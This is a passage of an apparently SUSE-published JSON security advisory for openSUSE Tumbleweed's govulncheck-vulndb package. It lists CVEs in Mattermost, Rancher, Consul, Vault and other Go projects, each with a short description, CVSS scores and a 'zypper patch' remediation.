"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11079"
},
{
"cve": "CVE-2016-11080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11080"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It offers superfluous APIs for a Team Administrator to view account details.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11080",
"url": "https://www.suse.com/security/cve/CVE-2016-11080"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11080"
},
{
"cve": "CVE-2016-11081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11081"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 2.2.0. It allows unintended access to information stored by a web browser.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11081",
"url": "https://www.suse.com/security/cve/CVE-2016-11081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11081"
},
{
"cve": "CVE-2016-11082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11082"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 2.2.0. It allows XSS via a crafted link.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11082",
"url": "https://www.suse.com/security/cve/CVE-2016-11082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11082"
},
{
"cve": "CVE-2016-11083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11083"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 2.2.0. It allows XSS because it configures files to be opened in a browser window.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11083",
"url": "https://www.suse.com/security/cve/CVE-2016-11083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11083"
},
{
"cve": "CVE-2016-11084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11084"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 2.1.0. It allows XSS via CSRF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11084",
"url": "https://www.suse.com/security/cve/CVE-2016-11084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11084"
},
{
"cve": "CVE-2017-18872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2017-18872"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 4.4.3 and 4.3.3. Attackers could reconfigure an OAuth app in some cases where Mattermost is an OAuth 2.0 service provider.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2017-18872",
"url": "https://www.suse.com/security/cve/CVE-2017-18872"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2017-18872"
},
{
"cve": "CVE-2023-32199",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-32199"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability has been identified within Rancher \nManager, where after removing a custom GlobalRole that gives \nadministrative access or the corresponding binding, the user still \nretains access to clusters. This only affects custom Global Roles that have a * on * in * rule for resources or have a * on * rule for non-resource URLs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-32199",
"url": "https://www.suse.com/security/cve/CVE-2023-32199"
},
{
"category": "external",
"summary": "SUSE Bug 1249102 for CVE-2023-32199",
"url": "https://bugzilla.suse.com/1249102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2023-32199"
},
{
"cve": "CVE-2024-58269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-58269"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability has been identified in Rancher Manager, where sensitive \ninformation, including secret data, cluster import URLs, and \nregistration tokens, is exposed to any entity with access to Rancher \naudit logs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-58269",
"url": "https://www.suse.com/security/cve/CVE-2024-58269"
},
{
"category": "external",
"summary": "SUSE Bug 1251532 for CVE-2024-58269",
"url": "https://bugzilla.suse.com/1251532"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-58269"
},
{
"cve": "CVE-2025-10545",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-10545"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.10, 10.11.x \u003c= 10.11.2 fail to properly validate guest user permissions when adding channel members which allows guest users to add any team members to their private channels via the `/api/v4/channels/{channel_id}/members` endpoint",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-10545",
"url": "https://www.suse.com/security/cve/CVE-2025-10545"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-10545"
},
{
"cve": "CVE-2025-10678",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-10678"
}
],
"notes": [
{
"category": "general",
"text": "NetBird VPN when installed using vendor\u0027s provided script failed to remove or change default password of an admin account created by ZITADEL.\nThis issue affects instances installed using vendor\u0027s provided script. This issue may affect instances created with Docker if the default password was not changed nor the user was removed.\n\nThis issue has been fixed in version 0.57.0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-10678",
"url": "https://www.suse.com/security/cve/CVE-2025-10678"
},
{
"category": "external",
"summary": "SUSE Bug 1252329 for CVE-2025-10678",
"url": "https://bugzilla.suse.com/1252329"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-10678"
},
{
"cve": "CVE-2025-10954",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-10954"
}
],
"notes": [
{
"category": "general",
"text": "Versions of the package github.com/nyaruka/phonenumbers before 1.2.2 are vulnerable to Improper Validation of Syntactic Correctness of Input in the phonenumbers.Parse() function. An attacker can cause a panic by providing crafted input causing a \"runtime error: slice bounds out of range\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-10954",
"url": "https://www.suse.com/security/cve/CVE-2025-10954"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-10954"
},
{
"cve": "CVE-2025-11374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-11374"
}
],
"notes": [
{
"category": "general",
"text": "Consul and Consul Enterprise\u0027s (\"Consul\") key/value endpoint is vulnerable to denial of service (DoS) due to incorrect Content Length header validation. This vulnerability, CVE-2025-11374, is fixed in Consul Community Edition 1.22.0 and Consul Enterprise 1.22.0, 1.21.6, 1.20.8 and 1.18.12.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-11374",
"url": "https://www.suse.com/security/cve/CVE-2025-11374"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-11374"
},
{
"cve": "CVE-2025-11375",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-11375"
}
],
"notes": [
{
"category": "general",
"text": "Consul and Consul Enterprise\u0027s (\"Consul\") event endpoint is vulnerable to denial of service (DoS) due to lack of maximum value on the Content Length header. This vulnerability, CVE-2025-11375, is fixed in Consul Community Edition 1.22.0 and Consul Enterprise 1.22.0, 1.21.6, 1.20.8 and 1.18.12.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-11375",
"url": "https://www.suse.com/security/cve/CVE-2025-11375"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-11375"
},
{
"cve": "CVE-2025-11579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-11579"
}
],
"notes": [
{
"category": "general",
"text": "github.com/nwaples/rardecode versions \u003c=2.1.1 fail to restrict the dictionary size when reading large RAR dictionary sizes, which allows an attacker to provide a specially crafted RAR file and cause Denial of Service via an Out Of Memory Crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-11579",
"url": "https://www.suse.com/security/cve/CVE-2025-11579"
},
{
"category": "external",
"summary": "SUSE Bug 1251871 for CVE-2025-11579",
"url": "https://bugzilla.suse.com/1251871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-11579"
},
{
"cve": "CVE-2025-11621",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-11621"
}
],
"notes": [
{
"category": "general",
"text": "Vault and Vault Enterprise\u0027s (\"Vault\") AWS Auth method may be susceptible to authentication bypass if the role of the configured bound_principal_iam is the same across AWS accounts, or uses a wildcard. This vulnerability, CVE-2025-11621, is fixed in Vault Community Edition 1.21.0 and Vault Enterprise 1.21.0, 1.20.5, 1.19.11, and 1.16.27",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-11621",
"url": "https://www.suse.com/security/cve/CVE-2025-11621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
